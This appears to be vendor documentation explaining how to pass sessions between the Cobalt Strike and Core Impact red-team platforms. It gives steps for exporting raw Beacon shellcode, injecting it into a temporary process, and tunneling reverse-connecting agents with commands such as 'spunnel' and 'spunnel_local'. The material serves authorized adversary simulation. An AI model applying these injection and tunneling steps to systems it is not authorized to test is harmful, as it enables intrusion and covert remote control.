Core Impact and Cobalt Strike Interoperability
Introduction
Contrary to many perceptions, Cobalt Strike is actually not a penetration testing tool. As we mentioned earlier, we identify as a tool for post-exploitation adversary simulations and Red Team operations. However, we have recently begun offering interoperability with Core Impact, which is a penetration testing tool with features that align well with those of Cobalt Strike.
Core Impact is typically used for exploitation and lateral movement and validating the attack paths often associated with a penetration test. Used by both in-house teams as well as third-party services, Core Impact offers capabilities for remote, local, and client-side exploitation. Impact also uses post-exploitation agents, which, while they don’t have a cool name like “Beacon,” are versatile in both their deployment and capabilities, including chaining and pivoting.
While a previous blog dives deeper into the particulars, to quickly summarize, the interoperability piece comes in the form of session passing between both platforms. Those with both tools can deploy Beacon from within Core Impact. Additionally, users can spawn an Impact agent from within Cobalt Strike.
References
- Core Impact & Cobalt Strike Datasheet
- Agent Deployed: Core Impact and Cobalt Strike Interoperability
- How to Extend Your Reach with Cobalt Strike
Session Passing from Core Impact to Cobalt Strike
One of the most important forms of tool interoperability is the ability to pass sessions between platforms.
Core Impact includes a Run shellcode in temporary process module to support session passing. This module spawns a temporary process and injects the contents of the specified file into it. The module does support spawning code x86 -> x86, x64 -> x64, and x64 -> x86.
To pass a session from Core Impact to Cobalt Strike:
Cobalt Strike
- Go to Payloads -> Windows Stageless Payload
- Click
…
to choose your listener - Change Output to
raw
- Check
x64
if you wish to export a x64 payload. - Click Generate and save the file
Core Impact
- Right-click on the desired agent and click Set as Source
- Find the
Run shellcode in temporary process
module and double-click it. - Set ARCHITECTURE to
x86-64
if you exported an x64 payload - Set FILENAME to the
file generated by Cobalt Strike
- Click OK
- After some seconds, you should see a new beacon deployed in Cobalt Strike.
This pattern is a great way to spawn Cobalt Strike’s Beacon after a successful remote or privilege escalation exploit with Core Impact.
Session Passing from Cobalt Strike to Core Impact
You can also spawn a Core Impact agent from Cobalt Strike too. If Core Impact and Cobalt Strike can reach the same network, this pattern is a light way to turn an access obtained with Beacon (e.g., via phishing, lateral movement, etc.) into an Impact agent.
Core Impact
- Find the
Package and Register Agent
module and double-click it. - Change ARCHITECTURE to
x86-64
if you’d like to export an x64 agent - Change BINARY TYPE to
raw
- Change TARGET FILE to where you would like to save the file
- Expand Agent Connection
- Change CONNECTION METHOD and PORT to fit your preference. I find the
Connect from target
(reverse TCP connection) is the most performant.
Cobalt Strike
- Interact with a Beacon
- Type
shspawn x64
if you exported an x64 agent. Typeshspawn x86
if you exported an x86 agent. - Find the
<file generated by Core Impact>
that you exported. - Click Open.
- After some seconds, you should hear the famous
New Agent Deployed
🔊 announcement within Core Impact.
Tunnel Core Impact exploits through Cobalt Strike
Core Impact has an interesting offensive model. Its exploits and scans do not originate from your Core Impact GUI. The entire framework is architected to delegate offense activity through a source agent. The currently selected source agent also acts as a controller to receive connections from reverse agents [or to connect to and establish control of bind agents]. In this model, the offense process is: start with local agent, find and exploit target, set new agent as source agent, find and exploit newly visible targets, repeat until satisfied.
As the agent is the main offense actor in Core Impact, tunneling Core Impact exploits is best accomplished by tunneling the Core Impact agent through Cobalt Strike’s Beacon.
Cobalt Strike introduced the spunnel command to spawn Core Impact’s Windows agent in a temporary process and create a localhost-only reverse port forward for it. Here are the steps to tunnel Core Impact’s agent with spunnel:
Core Impact
- Click the Modules tab in the Core Impact user interface
- Search for
Package and Register Agent
- Double-click this module
- Change Platform to
Windows
- Change Architecture to
x86-64
- Change Binary Type to
raw
- Click Target File and press
…
to decide where to save the output. - Go to Agent Connection
- Change Connection Method to
Connect from Target
- Change Connect Back Hostname to
127.0.0.1
- Change Port to
9000
(or any arbitrary value) and remember it. - Press OK.
Cobalt Strike
- Right click on the asset and press
Interact with a Beacon
- Type
spunnel x64 [impact IP address] 9000
and press enter. - Find the
file generated by Core Impact
that you exported. - Press Open.
- After some seconds, you should hear the famous
New Agent Deployed
🔊 announcement within Core Impact.
This similar to passing a session from Cobalt Strike to Core Impact. The difference here is that the Impact agent’s traffic is tunneled through Cobalt Strike’s Beacon payload.
What happens when Cobalt Strike’s team server is on the internet and Core Impact is on a local Windows virtual machine? We have a pattern for this too.
- Run a Cobalt Strike client from the same Windows system that Core Impact is installed on.
- Connect this Cobalt Strike client to your team server.
- In this setup, run
spunnel_local x64 127.0.0.1 9000
to spawn and tunnel the Impact agent through Beacon.
The spunnel_local command is like spunnel, with the difference that it routes the agent traffic from Beacon to the team server and onwards through your Cobalt Strike client. The spunnel_local command was designed for this exact situation.
Explore on Your Own
At this point, you have explored some of Cobalt Strike's feature. Feel free to explore and test other command or features.